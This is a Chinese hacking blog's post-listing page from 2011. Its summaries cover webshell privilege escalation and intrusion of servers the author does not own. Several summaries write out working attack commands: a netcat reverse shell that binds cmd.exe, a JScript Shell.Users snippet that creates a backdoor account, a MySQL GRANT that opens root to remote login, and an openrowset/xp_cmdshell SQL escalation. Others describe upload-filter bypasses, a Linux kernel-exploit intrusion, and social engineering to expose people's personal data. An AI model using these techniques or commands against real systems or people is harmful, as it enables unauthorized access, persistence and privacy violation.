上一页 1 ··· 15 16 17 18 19 20 21 22 23 ··· 30 下一页

2011年5月16日

Webshell 提权小技巧

摘要: Cmd路径:c:\windows\temp\cmd.exeNc 也在同目录下,例如反弹cmdshell:"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"通常都不会成功。而直接在 cmd 路径上输入:c:\windows\temp\nc.exe命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe却能成功。。这个不是重点我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。 阅读全文

posted @ 2011-05-16 12:01 =_=! 阅读(199) 评论(0) 推荐(0) 编辑

命令行下一种新的加帐号的方法

摘要: 今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:js:var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ;z.changePassword("123456& 阅读全文

posted @ 2011-05-16 10:39 =_=! 阅读(208) 评论(0) 推荐(0) 编辑

2011年5月13日

一句话开启mysql root外连

摘要: 如果遇到了服务器开启了 3306 端口,但是不允许root外连的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权.GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root密码' WITH GRANT OPTION; 阅读全文

posted @ 2011-05-13 11:02 =_=! 阅读(361) 评论(0) 推荐(0) 编辑

2011年5月12日

修改limit的值进行注入

摘要: 话说某脱裤的黑客被一个注入点弄得蛋疼了,详情请见 http://t00ls.net/thread-14032-1-1.html。 在t00ls发了个帖子,对于这些过滤啥,防火墙啥的,小菜我不懂啊,咱准备等其他黑客回答,然后学习学习,突然我帖子里看到精逼两个字,小菜我眼睛都直了,于是不自量力来折腾折腾.话说咱菜啊,咱碰到注入点没啥办法,咱能力不行,咱就用工具,正如某岛国爱情动作片里一下,拿起工具,干之,于是就掏出了穿山甲,看看是否能射进去。咱用起穿山甲,咱就sb了,明明是个点,啥都跑不出来哇。咱思考思考。稍微手工了一下,咱就明白了这就明白了吧换季的时候皮肤管理这就是关键字, 于是我在穿山甲的关键 阅读全文

posted @ 2011-05-12 01:13 =_=! 阅读(467) 评论(0) 推荐(0) 编辑

SQL注入不能多句执行时的一种突破方法(SA权限)

摘要: 有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。某牛给我以下语句提权select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')本机测试成功。但实际环境中却出现[微软] [ODBC SQL Server驱动] [SQL Server中] OLE DB提 阅读全文

posted @ 2011-05-12 00:10 =_=! 阅读(331) 评论(0) 推荐(0) 编辑

广义社工

摘要: ----------------------淫荡分割----------------------------文前说明:这里说到了一个类型的个人信息泄露,非100%成功率。是一个思路,是一个方法,无图无真相,支付宝不准告偶。听说支付宝的工程师早知道了,但没看人发出来,也许大牛们心照不宣,,我用了2年了,广大社工帝不可放过。另外我这里还有很多小技巧哦有人顶我,我就公布~----------------------高潮分割--------------------------------------------------看帖不回帖的,逼我用隐藏啊------从一个已知的线索搜索起搜到email获得目 阅读全文

posted @ 2011-05-12 00:08 =_=! 阅读(369) 评论(0) 推荐(0) 编辑

一些提权思路分享

摘要: 一:找可写目录这个很关键的,星外的可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。C:\7i24.com\iissafe\log\ '旧的星外可写,可以执行,但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的找可写其实 除了星外,大家一般的都可以找到,而且temp 都可以执行成功,二:杀器提权等各种提权,敏感文件然后什么反弹shell,还有一些铭感文件 ,找root sa 等 config 配置文件就不要我教了 阅读全文

posted @ 2011-05-12 00:02 =_=! 阅读(351) 评论(0) 推荐(0) 编辑

2011年5月11日

一次linux入侵提权到搞定目标网站

摘要: 刚上qq,一朋友叫我搞个网站。闲着无事打开一看是dz的,我手里没有0day只好旁注了。发现一站有ewebeditor的php版,登录后台添加了样式加上php,结果上传php马不成功。后来通过网站的说明文件才知道ewebeditor后台的样式只有abc管用,老规矩搞到一shell。拿到shell一看是linux的,想着先跨站。shell浏览目标站不行,命令行下输入ls -la /www.users/目标站/ 也不行。连接mysql,想out个shell到目标站也失败了。没办好,只好溢出了。上传1.pl反弹个shell到cmd。uname -r查看版本,2.6.18的,马上想到udev,试了不行。 阅读全文

posted @ 2011-05-11 23:59 =_=! 阅读(533) 评论(0) 推荐(0) 编辑

1433口令提权的详细过程

摘要: 前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧)下面来说sa下执行命令错误的几种情况:1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这 阅读全文

posted @ 2011-05-11 23:50 =_=! 阅读(1545) 评论(0) 推荐(0) 编辑

upfile 又一奇迹般的突破

摘要: 不知道各位。在上传的时候。 有没需要过。一个上传。 不修改名字。。然后上传目录已经被程序所定义了。然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。如何突破呢?其实是可以的. 关键是 [不修改名字]先来看看一个上传的数据包:POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-pow 阅读全文

posted @ 2011-05-11 23:48 =_=! 阅读(389) 评论(0) 推荐(0) 编辑

上一页 1 ··· 15 16 17 18 19 20 21 22 23 ··· 30 下一页

导航